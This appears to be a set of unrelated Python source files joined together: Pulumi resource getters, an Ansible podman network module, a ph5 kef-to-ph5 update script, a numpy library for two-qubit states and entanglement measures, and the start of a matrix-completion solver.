@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
The Description of the Project.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def features(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Defines the status (`enabled`, `disabled`) of the project features.
Valid features are `boards`, `repositories`, `pipelines`, `testplans`, `artifacts`
"""
return pulumi.get(self, "features")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The Project Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="processTemplateId")
def process_template_id(self) -> pulumi.Output[str]:
"""
The Process Template ID used by the Project.
"""
return pulumi.get(self, "process_template_id")
@property
@pulumi.getter(name="versionControl")
def version_control(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the version control system. Valid values: `Git` or `Tfvc`. Defaults to `Git`.
"""
return pulumi.get(self, "version_control")
@property
@pulumi.getter
def visibility(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the visibility of the Project. Valid values: `private` or `public`. Defaults to `private`.
"""
return pulumi.get(self, "visibility")
@property
@pulumi.getter(name="workItemTemplate")
def work_item_template(self) -> pulumi.Output[Optional[str]]:
"""
Specifies the work item template. Valid values: `Agile`, `Basic`, `CMMI` or `Scrum`. Defaults to `Agile`.
"""
return pulumi.get(self, "work_item_template")
|
#!/usr/bin/python
# Copyright (c) 2020 Red Hat
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r"""
module: podman_network
author:
- "<NAME> (@sshnaidm)"
version_added: '1.0.0'
short_description: Manage podman networks
notes: []
description:
- Manage podman networks with podman network command.
requirements:
- podman
options:
name:
description:
- Name of the network
type: str
required: True
executable:
description:
- Path to C(podman) executable if it is not in the C($PATH) on the
machine running C(podman)
default: 'podman'
type: str
disable_dns:
description:
- disable dns plugin (default "false")
type: bool
driver:
description:
- Driver to manage the network (default "bridge")
type: str
gateway:
description:
- IPv4 or IPv6 gateway for the subnet
type: str
internal:
description:
- Restrict external access from this network (default "false")
type: bool
ip_range:
description:
- Allocate container IP from range
type: str
ipv6:
description:
- Enable IPv6 (Dual Stack) networking. You must pass a IPv6 subnet.
The subnet option must be used with the ipv6 option.
type: bool
subnet:
description:
- Subnet in CIDR format
type: str
macvlan:
description:
- Create a Macvlan connection based on this device
type: str
opt:
description:
- Add network options. Currently 'vlan' and 'mtu' are supported.
type: dict
suboptions:
mtu:
description:
- MTU size for bridge network interface.
type: int
required: false
vlan:
description:
- VLAN tag for bridge which enables vlan_filtering.
type: int
required: false
debug:
description:
- Return additional information which can be helpful for investigations.
type: bool
default: False
state:
description:
- State of network, default 'present'
type: str
default: present
choices:
- present
- absent
recreate:
description:
- Recreate network even if exists.
type: bool
default: false
"""
EXAMPLES = r"""
- name: Create a podman network
containers.podman.podman_network:
name: podman_network
become: true
- name: Create internal podman network
containers.podman.podman_network:
name: podman_internal
internal: true
ip_range: 192.168.22.128/25
subnet: 192.168.22.0/24
gateway: 192.168.22.1
become: true
"""
RETURN = r"""
network:
description: Facts from created or updated networks
returned: always
type: list
sample: [
{
"cniVersion": "0.4.0",
"name": "podman",
"plugins": [
{
"bridge": "cni-podman0",
"ipMasq": true,
"ipam": {
"ranges": [
[
{
"gateway": "10.88.0.1",
"subnet": "10.88.0.0/16"
}
]
],
"routes": [
{
"dst": "0.0.0.0/0"
}
],
"type": "host-local"
},
"isGateway": true,
"type": "bridge"
},
{
"capabilities": {
"portMappings": true
},
"type": "portmap"
},
{
"backend": "iptables",
"type": "firewall"
}
]
}
]
"""
import json # noqa: F402
from distutils.version import LooseVersion # noqa: F402
import os # noqa: F402
try:
import ipaddress
HAS_IP_ADDRESS_MODULE = True
except ImportError:
HAS_IP_ADDRESS_MODULE = False
from ansible.module_utils.basic import AnsibleModule # noqa: F402
from ansible.module_utils._text import to_bytes, to_native # noqa: F402
from ansible_collections.containers.podman.plugins.module_utils.podman.common import lower_keys
class PodmanNetworkModuleParams:
"""Creates list of arguments for podman CLI command.
Arguments:
action {str} -- action type from 'create', 'delete'
params {dict} -- dictionary of module parameters
"""
def __init__(self, action, params, podman_version, module):
self.params = params
self.action = action
self.podman_version = podman_version
self.module = module
def construct_command_from_params(self):
"""Create a podman command from given module parameters.
Returns:
list -- list of byte strings for Popen command
"""
if self.action in ['delete']:
return self._simple_action()
if self.action in ['create']:
return self._create_action()
def _simple_action(self):
if self.action == 'delete':
cmd = ['rm', '-f', self.params['name']]
return [to_bytes(i, errors='surrogate_or_strict') for i in cmd]
def _create_action(self):
cmd = [self.action, self.params['name']]
all_param_methods = [func for func in dir(self)
if callable(getattr(self, func))
and func.startswith("addparam")]
params_set = (i for i in self.params if self.params[i] is not None)
for param in params_set:
func_name = "_".join(["addparam", param])
if func_name in all_param_methods:
cmd = getattr(self, func_name)(cmd)
return [to_bytes(i, errors='surrogate_or_strict') for i in cmd]
def check_version(self, param, minv=None, maxv=None):
if minv and LooseVersion(minv) > LooseVersion(
self.podman_version):
self.module.fail_json(msg="Parameter %s is supported from podman "
"version %s only! Current version is %s" % (
param, minv, self.podman_version))
if maxv and LooseVersion(maxv) < LooseVersion(
self.podman_version):
self.module.fail_json(msg="Parameter %s is supported till podman "
"version %s only! Current version is %s" % (
param, minv, self.podman_version))
def addparam_gateway(self, c):
return c + ['--gateway', self.params['gateway']]
def addparam_driver(self, c):
return c + ['--driver', self.params['driver']]
def addparam_subnet(self, c):
return c + ['--subnet', self.params['subnet']]
def addparam_ip_range(self, c):
return c + ['--ip-range', self.params['ip_range']]
def addparam_ipv6(self, c):
return c + ['--ipv6=%s' % self.params['ipv6']]
def addparam_macvlan(self, c):
return c + ['--macvlan', self.params['macvlan']]
def addparam_internal(self, c):
return c + ['--internal=%s' % self.params['internal']]
def addparam_opt(self, c):
for opt in self.params['opt'].items():
c += ['--opt',
b"=".join([to_bytes(k, errors='surrogate_or_strict')
for k in opt])]
return c
def addparam_disable_dns(self, c):
return c + ['--disable-dns=%s' % self.params['disable_dns']]
class PodmanNetworkDefaults:
def __init__(self, module, podman_version):
self.module = module
self.version = podman_version
self.defaults = {
'driver': 'bridge',
'disable_dns': False,
'internal': False,
}
def default_dict(self):
# make here any changes to self.defaults related to podman version
return self.defaults
class PodmanNetworkDiff:
def __init__(self, module, info, podman_version):
self.module = module
self.version = podman_version
self.default_dict = None
self.info = lower_keys(info)
self.params = self.defaultize()
self.diff = {'before': {}, 'after': {}}
self.non_idempotent = {}
def defaultize(self):
params_with_defaults = {}
self.default_dict = PodmanNetworkDefaults(
self.module, self.version).default_dict()
for p in self.module.params:
if self.module.params[p] is None and p in self.default_dict:
params_with_defaults[p] = self.default_dict[p]
else:
params_with_defaults[p] = self.module.params[p]
return params_with_defaults
def _diff_update_and_compare(self, param_name, before, after):
if before != after:
self.diff['before'].update({param_name: before})
self.diff['after'].update({param_name: after})
return True
return False
def diffparam_disable_dns(self):
# Whether network is internal or not
try:
internal = not self.info['plugins'][0]['isgateway']
except (IndexError, KeyError):
internal = False
# Whether network is rootless
rootless = os.geteuid() != 0
# Whether DNS plugin is installed
dns_installed = False
for f in [
'/usr/libexec/cni/dnsname',
'/usr/lib/cni/dnsname',
'/opt/cni/bin/dnsname',
'/opt/bridge/bin/dnsname'
]:
if os.path.exists(f):
dns_installed = True
before = not bool(
[k for k in self.info['plugins'] if 'domainname' in k])
if internal:
before = True
if rootless:
before = False
after = self.params['disable_dns']
# If dnsname plugin is not installed, default is disable_dns=True
if not dns_installed and self.module.params['disable_dns'] is None:
after = True
# Rootless networks will always have DNS enabled
if rootless and self.module.params['disable_dns'] is None:
after = False
# Internal networks have dns disabled from v3
if self.params['internal']:
after = True
return self._diff_update_and_compare('disable_dns', before, after)
def diffparam_driver(self):
# Currently only bridge is supported
before = after = 'bridge'
return self._diff_update_and_compare('driver', before, after)
def diffparam_gateway(self):
try:
before = self.info['plugins'][0]['ipam']['ranges'][0][0]['gateway']
except (IndexError, KeyError):
before = ''
after = before
if self.params['gateway'] is not None:
after = self.params['gateway']
return self._diff_update_and_compare('gateway', before, after)
def diffparam_internal(self):
try:
before = not self.info['plugins'][0]['isgateway']
except (IndexError, KeyError):
before = False
after = self.params['internal']
return self._diff_update_and_compare('internal', before, after)
def diffparam_ip_range(self):
# TODO(sshnaidm): implement IP to CIDR convert and vice versa
before = after = ''
return self._diff_update_and_compare('ip_range', before, after)
def diffparam_subnet(self):
try:
before = self.info['plugins'][0]['ipam']['ranges'][0][0]['subnet']
except (IndexError, KeyError):
before = ''
after = before
if self.params['subnet'] is not None:
after = self.params['subnet']
if HAS_IP_ADDRESS_MODULE:
after = ipaddress.ip_network(after).compressed
return self._diff_update_and_compare('subnet', before, after)
def diffparam_macvlan(self):
before = after = ''
return self._diff_update_and_compare('macvlan', before, after)
def diffparam_opt(self):
vlan_before = self.info['plugins'][0].get('vlan')
vlan_after = self.params['opt'].get('vlan') if self.params['opt'] else None
if vlan_before or vlan_after:
before, after = {'vlan': vlan_before}, {'vlan': vlan_after}
else:
before, after = {}, {}
mtu_before = self.info['plugins'][0].get('mtu')
mtu_after = self.params['opt'].get('mtu') if self.params['opt'] else None
if mtu_before or mtu_after:
before.update({'mtu': mtu_before})
after.update({'mtu': mtu_after})
return self._diff_update_and_compare('opt', before, after)
def is_different(self):
diff_func_list = [func for func in dir(self)
if callable(getattr(self, func)) and func.startswith(
"diffparam")]
fail_fast = not bool(self.module._diff)
different = False
for func_name in diff_func_list:
dff_func = getattr(self, func_name)
if dff_func():
if fail_fast:
return True
different = True
# Check non idempotent parameters
for p in self.non_idempotent:
if self.module.params[p] is not None and self.module.params[p] not in [{}, [], '']:
different = True
return different
class PodmanNetwork:
"""Perform network tasks.
Manages podman network, inspects it and checks its current state
"""
def __init__(self, module, name):
"""Initialize PodmanNetwork class.
Arguments:
module {obj} -- ansible module object
name {str} -- name of network
"""
super(PodmanNetwork, self).__init__()
self.module = module
self.name = name
self.stdout, self.stderr = '', ''
self.info = self.get_info()
self.version = self._get_podman_version()
self.diff = {}
self.actions = []
@property
def exists(self):
"""Check if network exists."""
return bool(self.info != {})
@property
def different(self):
"""Check if network is different."""
diffcheck = PodmanNetworkDiff(
self.module,
self.info,
self.version)
is_different = diffcheck.is_different()
diffs = diffcheck.diff
if self.module._diff and is_different and diffs['before'] and diffs['after']:
self.diff['before'] = "\n".join(
["%s - %s" % (k, v) for k, v in sorted(
diffs['before'].items())]) + "\n"
self.diff['after'] = "\n".join(
["%s - %s" % (k, v) for k, v in sorted(
diffs['after'].items())]) + "\n"
return is_different
def get_info(self):
"""Inspect network and gather info about it."""
# pylint: disable=unused-variable
rc, out, err = self.module.run_command(
[self.module.params['executable'], b'network', b'inspect', self.name])
return json.loads(out)[0] if rc == 0 else {}
def _get_podman_version(self):
# pylint: disable=unused-variable
rc, out, err = self.module.run_command(
[self.module.params['executable'], b'--version'])
if rc != 0 or not out or "version" not in out:
self.module.fail_json(msg="%s run failed!" %
self.module.params['executable'])
return out.split("version")[1].strip()
def _perform_action(self, action):
"""Perform action with network.
Arguments:
action {str} -- action to perform - create, stop, delete
"""
b_command = PodmanNetworkModuleParams(action,
self.module.params,
self.version,
self.module,
).construct_command_from_params()
full_cmd = " ".join([self.module.params['executable'], 'network']
+ [to_native(i) for i in b_command])
self.module.log("PODMAN-NETWORK-DEBUG: %s" % full_cmd)
self.actions.append(full_cmd)
if not self.module.check_mode:
rc, out, err = self.module.run_command(
[self.module.params['executable'], b'network'] + b_command,
expand_user_and_vars=False)
self.stdout = out
self.stderr = err
if rc != 0:
self.module.fail_json(
msg="Can't %s network %s" % (action, self.name),
stdout=out, stderr=err)
def delete(self):
"""Delete the network."""
self._perform_action('delete')
def create(self):
"""Create the network."""
self._perform_action('create')
def recreate(self):
"""Recreate the network."""
self.delete()
self.create()
class PodmanNetworkManager:
"""Module manager class.
Defines according to parameters what actions should be applied to network
"""
def __init__(self, module):
"""Initialize PodmanManager class.
Arguments:
module {obj} -- ansible module object
"""
super(PodmanNetworkManager, self).__init__()
self.module = module
self.results = {
'changed': False,
'actions': [],
'network': {},
}
self.name = self.module.params['name']
self.executable = \
self.module.get_bin_path(self.module.params['executable'],
required=True)
self.state = self.module.params['state']
self.recreate = self.module.params['recreate']
self.network = PodmanNetwork(self.module, self.name)
def update_network_result(self, changed=True):
"""Inspect the current network, update results with last info, exit.
Keyword Arguments:
changed {bool} -- whether any action was performed
(default: {True})
"""
facts = self.network.get_info() if changed else self.network.info
out, err = self.network.stdout, self.network.stderr
self.results.update({'changed': changed, 'network': facts,
'podman_actions': self.network.actions},
stdout=out, stderr=err)
if self.network.diff:
self.results.update({'diff': self.network.diff})
if self.module.params['debug']:
self.results.update({'podman_version': self.network.version})
self.module.exit_json(**self.results)
def execute(self):
"""Execute the desired action according to map of actions & states."""
states_map = {
'present': self.make_present,
'absent': self.make_absent,
}
process_action = states_map[self.state]
process_action()
self.module.fail_json(msg="Unexpected logic error happened, "
"please contact maintainers ASAP!")
def make_present(self):
"""Run actions if desired state is 'started'."""
if not self.network.exists:
self.network.create()
self.results['actions'].append('created %s' % self.network.name)
self.update_network_result()
elif self.recreate or self.network.different:
self.network.recreate()
self.results['actions'].append('recreated %s' %
self.network.name)
self.update_network_result()
else:
self.update_network_result(changed=False)
def make_absent(self):
"""Run actions if desired state is 'absent'."""
if not self.network.exists:
self.results.update({'changed': False})
elif self.network.exists:
self.network.delete()
self.results['actions'].append('deleted %s' % self.network.name)
self.results.update({'changed': True})
self.results.update({'network': {},
'podman_actions': self.network.actions})
self.module.exit_json(**self.results)
def main():
module = AnsibleModule(
argument_spec=dict(
state=dict(type='str', default="present",
choices=['present', 'absent']),
name=dict(type='str', required=True),
disable_dns=dict(type='bool', required=False),
driver=dict(type='str', required=False),
gateway=dict(type='str', required=False),
internal=dict(type='bool', required=False),
ip_range=dict(type='str', required=False),
ipv6=dict(type='bool', required=False),
subnet=dict(type='str', required=False),
macvlan=dict(type='str', required=False),
opt=dict(type='dict', required=False,
options=dict(
mtu=dict(type='int', required=False),
vlan=dict(type='int', required=False))),
executable=dict(type='str', required=False, default='podman'),
debug=dict(type='bool', default=False),
recreate=dict(type='bool', default=False),
),
required_by=dict( # for IP range and GW to set 'subnet' is required
ip_range=('subnet'),
gateway=('subnet'),
))
PodmanNetworkManager(module).execute()
if __name__ == '__main__':
main()
|
#!/usr/bin/env pnpython3
#
# Update a ph5 file from a kef file
#
# <NAME>, January 2007
#
import argparse
import logging
import os
import os.path
import time
from ph5.core import experiment, kefx, columns
PROG_VERSION = '2018.268'
LOGGER = logging.getLogger(__name__)
# Force time zone to UTC
os.environ['TZ'] = 'UTC'
time.tzset()
def get_args():
global KEFFILE, PH5, PATH, TRACE
parser = argparse.ArgumentParser(
formatter_class=argparse.RawTextHelpFormatter)
parser.usage = ("kef2ph5 --kef kef_file --nickname ph5_file_prefix "
"[--path path]")
parser.description = ("Update a ph5 file from a kef file.\n\nVersion: {0}"
.format(PROG_VERSION))
parser.add_argument("-n", "--nickname", dest="outfile",
help="The ph5 file prefix (experiment nickname).",
required=True)
parser.add_argument("-k", "--kef", dest="keffile",
help="Kitchen Exchange Format file.", required=True)
parser.add_argument("-p", "--path", dest="path",
help="Path to directory where ph5 files are stored.",
default=".")
parser.add_argument("-c", "--check", action="store_true", default=False,
dest="check",
help="Show what will be done but don't do it!")
args = parser.parse_args()
KEFFILE = args.keffile
PH5 = args.outfile
PATH = args.path
TRACE = args.check
def initializeExperiment():
global EX, PH5, PATH
EX = experiment.ExperimentGroup(nickname=PH5, currentpath=PATH)
EDIT = True
EX.ph5open(EDIT)
EX.initgroup()
def add_references(rs):
''' Add a reference for each Das_t so we can look it up later '''
import string
global EX
for r in rs:
flds = string.split(r, '/')
das = string.split(flds[3], '_')[2]
g = EX.ph5_g_receivers.getdas_g(das)
EX.ph5_g_receivers.setcurrent(g)
# Set reference
columns.add_reference(r, EX.ph5_g_receivers.current_t_das)
def populateTables():
global EX, KEFFILE, TRACE
LOGGER.info("Loading {0} into {1}.".format(KEFFILE, PH5))
k = kefx.Kef(KEFFILE)
k.open()
while True:
n = k.read(10000)
if n == 0:
err = "Empty kef file."
break
# Get Das_g references
ret = k.strip_receiver_g()
if ret:
add_references(ret)
# Make sure Array_t_xxx, Event_t_xxx, and Offset_t_aaa_sss exist
arrays, events, offsets = k.strip_a_e_o()
if arrays:
for a in arrays:
a = a.split(':')[0]
EX.ph5_g_sorts.newArraySort(a)
if events:
for e in events:
e = e.split(':')[0]
EX.ph5_g_sorts.newEventSort(e)
if offsets:
for o in offsets:
o = o.split(':')[0]
EX.ph5_g_sorts.newOffsetSort(o)
if TRACE is True:
err = k.batch_update(trace=True)
else:
err = k.batch_update()
k.close()
if err is True:
LOGGER.error("There were errors! See output.")
def closePH5():
global EX
EX.ph5close()
def update_log():
''' Write a log of kef2ph5 activities. '''
global PH5, KEFFILE, PATH, TRACE
# Don't log when run with the -c option
if TRACE is True:
return
keffile = KEFFILE
ph5file = os.path.join(PATH, PH5)
klog = os.path.join(PATH, "kef2ph5.log")
kef_mtime = time.ctime(os.stat(keffile).st_mtime)
now = time.ctime(time.time())
line = "%s*:*%s*:*%s*:*%s\n" % (now, ph5file, keffile, kef_mtime)
if not os.path.exists(klog):
line = "modification_time*:*experiment_nickname*:*\
kef_filename*:*kef_file_mod_time\n" + \
"-------------------------------------------------------------\
-------------\n" + line
try:
LOGGER.info("Updated kef2ph5.log file.")
fh = open(klog, 'a+')
fh.write(line)
fh.close()
except BaseException:
LOGGER.warning("Failed to write kef2ph5.log file.")
def main():
get_args()
initializeExperiment()
populateTables()
closePH5()
update_log()
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 04 22:18:20 2018
@author0: MIUK
@author1: FS
Purpose: Deal with the operations on pure bipartite
quantum states
Bipartite states are represented using kronecker product
i.e. with Psi_A = [a,b] Psi_b = [c, d]
-> Psi_AB = Psi_A x Psi_B = [ac, ad, bc, bd] (x is a tensor prod)
Conventions
-----------
+ Computational basis
|0> = [1,0] |1> = [0,1]
then |00> = [1,0,0,0], |01> = [0,1,0,0], |10> = [0,0,1,0]
and |11> = [0,0,0,1]
+ Pauli matrices
X = 0 1 // Y = 0 -i // Z = 1 0
1 0 i 0 0 -1
d: refers to the dimension of the hilbert space
Caredull with the dimensions and shapes
"""
import numpy as np
from scipy import linalg, stats, optimize
# ===================================================================================== #
# Manipulation of pure bi-partite states (sometimes slightly more general)
# ===================================================================================== #
qb_0 = np.array([1., 0], dtype='complex128')
qb_1 = np.array([0, 1.], dtype='complex128')
qb_basis = np.stack([qb_0, qb_1], 1)
qbs_00 = np.kron(qb_0, qb_0)
qbs_01 = np.kron(qb_0, qb_1)
qbs_10 = np.kron(qb_1, qb_0)
qbs_11 = np.kron(qb_1, qb_1)
# Maybe change the convention such that it matches the convention for the qubits
# representation
X = np.array([[0, 1.], [1., 0]], dtype='complex128')
Y = np.array([[0, -1.j], [1.j, 0]], dtype='complex128')
Z = np.array([[1., 0], [0 ,-1]], dtype='complex128')
I = np.array([[1., 0], [0 ,1.]], dtype='complex128')
bell0 = 1/np.sqrt(2) * np.array([1., 0, 0, 1.], dtype='complex128')
bell1 = 1/np.sqrt(2) * np.array([1., 0, 0, -1.], dtype='complex128')
bell2 = 1/np.sqrt(2) * np.array([0, 1., 1., 0], dtype='complex128')
bell3 = 1/np.sqrt(2) * np.array([0, 1., -1., 0], dtype='complex128')
def state_to_dm(states):
""" Compute density matrices from a list of states
Only deals with bipartite state
Arguments
---------
state_vectors: numy
1d shape = (4) single state
3d shape = (nb_states, 4)
"""
n_dim = np.ndim(states)
if(n_dim == 2):
ket = np.reshape(states, (len(states), 4, 1))
bra = np.conjugate(np.reshape(states, (len(states), 1, 4)))
elif(n_dim == 1):
ket = np.reshape(states, (4, 1))
bra = np.conjugate(np.reshape(states, (1, 4)))
rho = ket * bra
return rho
def ip(state0, state1):
""" Inner product between two states (or list)
Arguments
---------
state: np.array
1d shape (d) i.e. only one state
2d shape (n_states, d)
Output
------
2-d np.array with dimension (nb_states0, nb_states_1)
"""
state0 = state0[np.newaxis, :] if np.ndim(state0) == 1 else state0
state1 = state1[np.newaxis, :] if np.ndim(state1) == 1 else state1
return np.dot(np.conjugate(state0), np.transpose(state1))
def ip_square(state0, state1):
""" square module of the inner product
Same output dimensions as teh output of ip()"""
return np.square(np.abs(ip(state0, state1)))
def norm(states):
""" Norm of state (or collection of states)
Same output dimensions as teh output of ip()"""
return np.sqrt(np.real(ip(states, states)))
def partial_trace(rho, subsystem='A'):
""" Compute the partial trace of a bipartite system. It relies
on einstein summation
Arguments
---------
rho: np.array
density matrix
shape = (4 x 4) one density matrix
shape = (N x 4 x 4) a collection of density matrices
"""
n_dim = np.ndim(rho)
if(n_dim == 3):
rho_rshp = np.reshape(rho, (len(rho), 2, 2, 2, 2))
if(subsystem == 'A'):
rho_partial = np.einsum('aijik->ajk', rho_rshp)
else:
rho_partial = np.einsum('aijkj->aik', rho_rshp)
elif(n_dim == 2):
rho_rshp = np.reshape(rho, (2, 2, 2, 2))
if(subsystem == 'A'):
rho_partial = np.einsum('ijik->jk', rho_rshp)
else:
rho_partial = np.einsum('ijkj->ik', rho_rshp)
return np.array(rho_partial);
def meas_one_sub(states, nb_measures=np.inf, n = [1,0,0], subsystem = 'A'):
"""simulates projective measurements on only one of the subsystem.
Works only for two-qubits states
Arguments
---------
states:
a list of state vectors
nb_measures: int
number of measurements to perform
by default infinity, i.e. return the true expectation value of the
operator, else if it is a finite number will return empirical value
n: list<int>
Encode the mesurement hermitian operator
[a, b, c] -> O = aX + bY + cZ
subsystem: <str>
'A' or 'B' on which subsystem do we perform the measurement
Output
------
res 1d np.array with the same length as states
Estimation of the expected value <O>
"""
O = n[0] * X + n[1] * Y + n[2] * Z
eigenvals, eigenvecs = np.linalg.eig(O)
assert _is_real_enough(eigenvals), "O has complex (i.e not real) eigenvalues"
eigenvals = np.real(eigenvals)
if(subsystem == 'A'):
proj_basis = [np.stack([np.kron(e, qb_0), np.kron(e, qb_1)]) for e in
np.transpose(eigenvecs)]
else:
proj_basis = [np.stack([np.kron(qb_0, e), np.kron(qb_1, e)]) for e in
np.transpose(eigenvecs)]
probs = proj_proba(states, basis = proj_basis)
assert np.allclose(np.sum(probs, 1), 1.), "Measurement probas don't sum to 1"
if(nb_measures == np.inf):
res = np.dot(probs, eigenvals)
else:
freq = np.random.binomial(nb_measures, probs[:,0]) / nb_measures
res = eigenvals[0] * freq + eigenvals[1] * (1-freq)
return res
def proj_proba(states, basis = None):
""" proba of being projected on a list of vectors (subspaces)
Arguments
---------
states: np.array
1d shape = (d)
2d shape = (nb_states, d)
basis: list
In which basis do we perofrm the measurements.
basis[i] is a np.array
1d shape = (d) specify the projection onto a vector
2d shape = (n_sub, d) specify the projection onto a subspace
By default if the basis is not specified it will be the
computational basis
Output
------
probs: np.array
shape = (nb_states,nb_subspaces_proj)
where proba[n, i] is the proba of the n-th state
to be projected on the i-th basis vector
"""
states = np.array(states)[np.newaxis, :] if np.ndim(states) == 1 else np.array(states)
dim_H = states.shape[1]
basis = np.eye(dim_H) if basis is None else basis
probs = [np.sum(ip_square(states, b), 1) for b in basis]
return np.transpose(probs)
def samples_from_proba(probs, nb_samples):
""" to do later"""
pass
# ===================================================================================== #
# Entanglement
# Mostly based on the Von Newman Entropy of the partial trace of a density matrix
# It could be extended to incorporate other measures
# ===================================================================================== #
def entangl_of_states(states, subsystem = 'A'):
""" get a measure of entanglement (based on the Von Newman entropy of
the partial trace) of a list of states.
For entangled (separable) verify it retuns log(2) (0)
Arguments
---------
states: nd-array
shape = ()
shape = ()
subsystem: str
On which subsystem do we trace out
TODO: verif that it returns the same result whatever the subsystem is
"""
return vne_of_dm(partial_trace(state_to_dm(states), subsystem = subsystem))
def vne_of_dm(rhos):
""" Von Newman entropy of a list of density matrices
vne_of_dm(rhos) = - tr[rho * log(pho)]
= - sum_i e_i * log(e_i) where e_i's are the eigenvalues of rhos
Arguments
---------
rhos: nd-array
shape = (d,d) one density matrix (d is the dim of the Hilbert space)
shape = (nb_rho, d, d) collection of density matrices
"""
if np.ndim(rhos) == 2:
e = linalg.eigvals(rhos)
assert _is_real_enough(e), "Imaginary values of the eigenvalues are not null"
e = np.real(e)
vn_entrop = - np.dot(e[e!=0], np.log(e[e!=0]))
elif(np.ndim(rhos) == 3):
vn_entrop = np.array([vne_of_dm(r) for r in rhos])
return vn_entrop
def concurrence(psi):
""" bipartite concurrence
Another measure of entanglement. C = abs(alpha*delta - beta*gamma). C = 0 if seperable
and 1 if maximally entangled. C would be between 0 and 1 otherwise suggesting entanglement.
TODO: verify/test
"""
conarray = np.zeros((len(psi),1,1)) + 0j*np.zeros((len(psi),1,1))
for index in range(len(psi)):
conarray[index] = 2*np.sqrt((psi[index][0]*psi[index][3] -
psi[index][1]*psi[index][2])*np.conjugate(psi[index][0]*psi[index][3] -
psi[index][1]*psi[index][2]))
return conarray
# ===================================================================================== #
# Use of Schmidt decomposition to generate random (two qubits) statesbn with a certain
# amount of entanglement
# |psi> = sqrt(lambda) |i>_A|i>_B + sqrt(1-lambda) |j>_A|j>_B
# Then Entanglement(|psi>) = - [lambda * log(lambda) + (1-lambda) * log(1-lambda)
#
# TODO: test vne_to_lambda
# ===================================================================================== #
def grid_lambda_gen(res):
""" Generates lambda values s.t. entanglements lie on a regularly spaced grid
where the resolution is res.
*** Not really in use ***
"""
ent_space = np.linspace(0, np.log(2),res)
np.random.shuffle(ent_space)
la = [ent_to_lambda(v) for v in ent_space]
la = np.clip(la, 0, 1)
return la
def rdm_lambda_gen(nb):
""" Generates lambda values (cf. Schmidt decomposition) s.t. the associated
Von Newman entropies have an uniform distribution on [0, ln(2))
vne = - [la * log(la) + (1 - la) * log(1 - la)]
"""
vne = np.log(2) * np.random.random(nb)
la = [ent_to_lambda(v) for v in vne]
la = np.clip(la, 0, 1)
return la
def ent_to_lambda(ent):
""" invert (numerically) lambda_to_vne """
if(np.ndim(ent) == 0):
if(ent == 0):
lambd = 0
else:
func_root = lambda la: lambda_to_ent(la) - ent
lambd = optimize.newton(func_root, 10e-12)
else:
tmp = [ent_to_lambda(e) for e in np.nditer(ent)]
lambd = np.reshape(tmp, np.shape(ent))
return lambd
def lambda_to_ent(la):
""" entanglement from a schmidt coeff lambda
ent = - [la * log(la) + (1 - la) * log(1 - la)]
where la (lambda) is the Schmidt coefficient
"""
return - np.nan_to_num((1-la)*np.log(1-la) + la*np.log(la))
def rdm_states_from_lambda(lambdas):
""" For a collection of lambdas generate a collection of
random states. Build based on the Schmidt decomposition
of a pure bipartite state:
|psi> = sqrt(lambda) |i_A>|i_B> + sqrt(1 - lambda) |j_A>|j_B>
where {|i_A>, |i_B>} ({|j_A>, |j_B>}) are a basis of the system A (B)
"""
nb_states = 1 if np.ndim(lambdas) == 0 else len(lambdas)
basis_A = gen_rdm_basis(nb_states, 2)
basis_B = gen_rdm_basis(nb_states, 2)
if(nb_states > 1):
states = [np.sqrt(l) * np.kron(i_A[:,0], i_B[:,0]) + np.sqrt(1 - l) * np.kron(i_A[:,1], i_B[:,1])
for l, i_A, i_B in zip(lambdas, basis_A, basis_B)]
else:
states = np.sqrt(lambdas) * np.kron(basis_A[:,0], basis_B[:,0])
states += np.sqrt(1 - lambdas) * np.kron(basis_A[:,1], basis_B[:,1])
return np.array(states)
def gen_rdm_basis(nb, dim):
""" Generate a random basis. Based on the generation of random
unitaries U(N) from scipy.stats.unitary_group.rvs.
Argument
--------
nb: int
number of states to generate
dim: int
dimension of the Hilbert space
Output
------
2d or 3-d np.array
shape = ((nb), dim, dim)
where output[(n), :, i] is the i-th state of the n-th basis
"""
u = stats.unitary_group.rvs(dim, size=nb)
return u
def _is_real_enough(e):
""" test if the imaginary part is null (or really close to 0)"""
return np.allclose(np.imag(e), 0.)
|
<gh_stars>0
#! /usr/bin/env python
"""A matrix completion solver the implements Algorithm 6 (Matrix
Completion via Inexact ALM Method) from
"The Augmented Lagrange Multipler Method for Exact Recovery of
Corrupted Low-Rank Matrices"
by <NAME>, <NAME>, <NAME>, and <NAME>
http://arxiv.org/abs/1009.5055
This version is optimized for partially observed matrices.
"""
import numpy as np
import scipy.sparse as sp
from dimredu.lib.sparseSVDUpdate import sparseSVDUpdate
from dimredu.lib.projSVD import projSVD
from dimredu.lib.sparseFrobeniusNorm import sparseFrobeniusNorm
from dimredu.lib.minNucPlusFrob import minNucPlusFrob
def MC(m, n, u, v, d, maxRank, mu_0=None, rho=None, epsilon1=None,
epsilon2=None, maxIteration=100, verbose=True, hasWeave=True):
""" This is an optimized code from:
"The Augmented Lagrange Multipler Method for Exact Recovery
of Corrupted Low-Rank Matrices"
by <NAME>, <NAME>, and <NAME>
http://arxiv.org/abs/1009.5055
Args:
m, n: the full size of D.
u, v, d: the samples of D as indices and values of a sparse matrix.
All are one dimensional arrays.
maxRank: the maximum rank of D to consider for completion.
(note, Lin-Che-Ma have a way to predict this,
which we are not using here)
mu_0: the intial value for the augmented Lagrangian parameter.
(optional, defaults to value from
Lin-Chen-Ma)
rho: the growth factor for the augmented Lagrangian parameter.
(optional, defaults to value from Lin-Chen-Ma)
epsilon1: the first error criterion that controls for the error in
the constraint. (optional, defaults to value from Lin-Chen-Ma)
epsilon2: the second error criterion that controls for the convergence
of the method. (optional, defaults to value from Lin-Chen-Ma)
maxIterations: the maximum number of iterations to use.
(optional, defaults to 100)
verbose: print out the convergence history.
(optional, defaults to True)
Returns:
A: the recovered matrix.
E: the differences between the input matrix and the recovered matrix,
so A+E=D.
(Note, generally E is not important, but Lin-Chen-Ma return
it so we do the same here.)
"""
